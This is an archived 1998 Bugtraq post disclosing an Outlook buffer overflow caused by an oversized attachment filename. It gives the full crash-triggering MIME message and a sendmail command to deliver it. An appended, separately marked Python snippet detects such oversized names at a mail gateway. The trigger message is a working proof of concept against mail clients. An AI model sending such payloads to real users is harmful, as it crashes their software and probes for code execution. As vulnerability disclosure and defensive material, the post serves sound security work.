Bugtraq mailing list archives

One of the Outlook overflows


From: root () RYANSPC COM (Ryan Veety)
Date: Wed, 29 Jul 1998 16:34:54 -0400


There have been a few posts about overflows in MS Outlook, but they have
not told exactly where in the message the overflow exists.  I have found
one of them, within the description of an attachment.  If the filename
given is very large, it makes Outlook crash.  I tried this on Outlook
v4.72.2106.4 on NT 4.0, and on win95.  In both cases it reported an error
at address 0x41414141 (41 == hex A).  Here is the message that caused the
errors:

--------------------------- START HERE --------------------------------

From: <From address here>
To: <To address here>
Subject: test
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; 
filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

------------------------ END HERE --------------------------------------

To send the message, save it to a file, set the to: and from:, and run
"sendmail -t < fileyousaved"

It causes Outlook to crash when the user attempts to open or save the
file.  According to a previous post, there are many of these overflows in
the attachment descriptors.  This one requires the user to open the
attachment, but similar overflows may not.

Ryan

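A gateway-side check for the condition described in the post, added here as an example and not part of the original message: it flags MIME parts whose attachment name exceeds a length limit, including names split across RFC 2231 continuations and a `filename=` line left unfolded as in the posted sample. The 255-character limit, the function names and the constructed sample message are assumptions.

```python
import email
import re
from email.utils import collapse_rfc2231_value

MAX_NAME_LEN = 255  # assumed policy limit, not a value from the post

# Heuristic fallback for names the MIME parser never sees, e.g. a "filename="
# line that follows its header without folding whitespace.
RAW_NAME = re.compile(rb'(?im)^[ \t]*(?:file)?name\s*=\s*"?([^";\r\n]+)')

def oversized_attachment_names(raw, limit=MAX_NAME_LEN):
    """Return (source, length) for each attachment name longer than limit."""
    findings = []
    msg = email.message_from_bytes(raw)
    for part in msg.walk():
        for header, param in (("Content-Disposition", "filename"),
                              ("Content-Type", "name")):
            value = part.get_param(param, header=header)
            if value is None:
                continue
            # RFC 2231 continuations (filename*0=, filename*1=) arrive joined,
            # so splitting a long name into short pieces does not hide it.
            name = collapse_rfc2231_value(value)
            if len(name) > limit:
                findings.append((f"{header}; {param}", len(name)))
    if not findings:  # message not yet flagged: scan the raw lines as well
        for m in RAW_NAME.finditer(raw):
            if len(m.group(1)) > limit:
                findings.append(("raw line", len(m.group(1))))
    return findings

def build_sample(disposition):
    """Constructed two-part message shaped like the one in the post."""
    return ("From: a@example.com\r\nTo: b@example.com\r\nSubject: test\r\n"
            "MIME-Version: 1.0\r\n"
            'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
            "--b1\r\nContent-Type: text/plain\r\n\r\ntest\r\n"
            "--b1\r\nContent-Type: text/plain\r\n"
            f"Content-Disposition: {disposition}\r\n\r\nbody\r\n--b1--\r\n"
            ).encode("ascii")

if __name__ == "__main__":
    folded = build_sample("attachment;\r\n filename=" + "A" * 600)
    print(oversized_attachment_names(folded))
```

A mail gateway would quarantine or truncate on a non-empty result; the raw-line fallback can match long body lines that begin with `name=`, so treat it as a lower-confidence signal.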


